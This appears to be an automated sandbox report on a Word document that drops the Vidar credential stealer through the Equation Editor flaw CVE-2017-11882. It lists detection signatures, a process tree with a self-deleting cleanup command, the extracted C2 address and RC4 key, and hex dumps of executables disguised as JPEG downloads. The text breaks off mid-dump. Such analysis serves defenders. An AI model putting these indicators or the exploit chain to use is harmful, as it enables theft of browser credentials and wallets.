Loading ...

Play interactive tourEdit tour

Analysis Report PL_503_13_570.docx

Overview

General Information

Sample Name:PL_503_13_570.docx
Analysis ID:404284
MD5:158e499db47d9c6a56449c86f3b1596f
SHA1:6d0e9274649112ec7e9a757168b7de6eb2c48ff2
SHA256:5e7fe9a4eb6dc098b6ed28b083d277455d66a515e7c78b270ad0515a90279f45
Infos:

Most interesting Screenshot:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected Vidar stealer
Allocates memory in foreign processes
Creates an undocumented autostart registry key
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Posts data to a JPG file (protocol mismatch)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains no OLE stream with summary information
Document has an unknown application name
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2152 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2620 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • toqqx.exe (PID: 2828 cmdline: C:\Users\user\toqqx.exe MD5: 5753388FBFCDE9E08D00AC9E2BE5D881)
      • toqqx.exe (PID: 2540 cmdline: C:\Users\user\AppData\Local\Temp\toqqx.exe MD5: 5753388FBFCDE9E08D00AC9E2BE5D881)
        • cmd.exe (PID: 3036 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /pid 2540 & erase C:\Users\user\AppData\Local\Temp\toqqx.exe & RD /S /Q C:\\ProgramData\\843743064682002\\* & exit MD5: AD7B9C14083B52BC532FBA5948342B98)
          • taskkill.exe (PID: 2296 cmdline: taskkill /pid 2540 MD5: 94BDCAFBD584C979B385ADEE14B08AB4)
  • EQNEDT32.EXE (PID: 2944 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • EQNEDT32.EXE (PID: 2480 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • toqqx.exe (PID: 2896 cmdline: C:\Users\user\toqqx.exe MD5: 5753388FBFCDE9E08D00AC9E2BE5D881)
      • toqqx.exe (PID: 2492 cmdline: C:\Users\user\AppData\Local\Temp\toqqx.exe MD5: 5753388FBFCDE9E08D00AC9E2BE5D881)
  • EQNEDT32.EXE (PID: 2276 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • EQNEDT32.EXE (PID: 2228 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

Threatname: Vidar

{"C2 url": "198.98.60.43", "RC4 Key": "056139954853430408"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: toqqx.exe PID: 2540JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Sigma Overview

    Exploits:

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internetShow sources
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 31.210.20.6, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2620, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Sigma detected: File Dropped By EQNEDT32EXEShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2620, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Sugvt[1].exe

    System Summary:

    barindex
    Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\toqqx.exe, CommandLine: C:\Users\user\toqqx.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\toqqx.exe, NewProcessName: C:\Users\user\toqqx.exe, OriginalFileName: C:\Users\user\toqqx.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2620, ProcessCommandLine: C:\Users\user\toqqx.exe, ProcessId: 2828

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 8.2.toqqx.exe.3526ab8.5.unpackMalware Configuration Extractor: Vidar {"C2 url": "198.98.60.43", "RC4 Key": "056139954853430408"}
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Sugvt[1].exeReversingLabs: Detection: 46%
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeReversingLabs: Detection: 46%
    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exeReversingLabs: Detection: 46%
    Source: C:\Users\user\toqqx.exeReversingLabs: Detection: 46%
    Multi AV Scanner detection for submitted fileShow sources
    Source: PL_503_13_570.docxVirustotal: Detection: 36%Perma Link
    Source: PL_503_13_570.docxReversingLabs: Detection: 34%
    Source: 4.2.toqqx.exe.34fea98.5.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: 8.2.toqqx.exe.3526ab8.5.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: 4.2.toqqx.exe.3576ad8.7.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: 8.2.toqqx.exe.34fea98.6.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: 8.2.toqqx.exe.3576ad8.7.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: 4.2.toqqx.exe.3526ab8.6.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041CB10 CryptUnprotectData,LocalAlloc,LocalFree,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041C900 _memset,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041CBA0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041CD30 _malloc,_malloc,CryptUnprotectData,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041EED0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_0041CB10 CryptUnprotectData,LocalAlloc,LocalFree,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_0041C900 _memset,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_0041CBA0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_0041CD30 _malloc,_malloc,CryptUnprotectData,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_0041EED0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,

    Exploits:

    barindex
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\toqqx.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\toqqx.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\toqqx.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\toqqx.exe
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: vcruntime140.i386.pdb source: toqqx.exe, 0000000B.00000003.2251913088.000000000097A000.00000004.00000001.sdmp
    Source: Binary string: vcruntime140.i386.pdbGCTL source: toqqx.exe, 0000000B.00000003.2251913088.000000000097A000.00000004.00000001.sdmp
    Source: Binary string: msvcp140.i386.pdbGCTL source: toqqx.exe, 0000000B.00000003.2242122953.0000000000A7D000.00000004.00000001.sdmp
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: toqqx.exe, 0000000B.00000003.2241406880.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: toqqx.exe, 0000000B.00000003.2241406880.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: msvcp140.i386.pdb source: toqqx.exe, 0000000B.00000003.2242122953.0000000000A7D000.00000004.00000001.sdmp
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_004043DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_00420540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041F6B0 FindFirstFileExW,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_0041E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_0041D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_004043DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_00420540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_0041F6B0 FindFirstFileExW,
    Source: C:\Users\user\toqqx.exeCode function: 4x nop then jmp 0035DEC5h
    Source: C:\Users\user\toqqx.exeCode function: 4x nop then jmp 0035DEC5h
    Source: C:\Users\user\toqqx.exeCode function: 4x nop then jmp 003BDE85h
    Source: C:\Users\user\toqqx.exeCode function: 4x nop then jmp 003BDE85h
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 4x nop then add esp, 04h
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 4x nop then add esp, 04h
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 31.210.20.6:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 31.210.20.6:80

    Networking:

    barindex
    Downloads files with wrong headers with respect to MIME Content-TypeShow sources
    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:04 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:52 GMT ETag: "235d0-58aa827e4d400" Accept-Ranges: bytes Content-Length: 144848 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:04 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Mon, 07 Aug 2017 05:52:20 GMT ETag: "9d9d8-5562373312d00" Accept-Ranges: bytes Content-Length: 645592 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00
    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:06 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:00:58 GMT ETag: "519d0-58aa824acda80" Accept-Ranges: bytes Content-Length: 334288 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:07 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:20 GMT ETag: "217d0-58aa825fc8c00" Accept-Ranges: bytes Content-Length: 137168 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 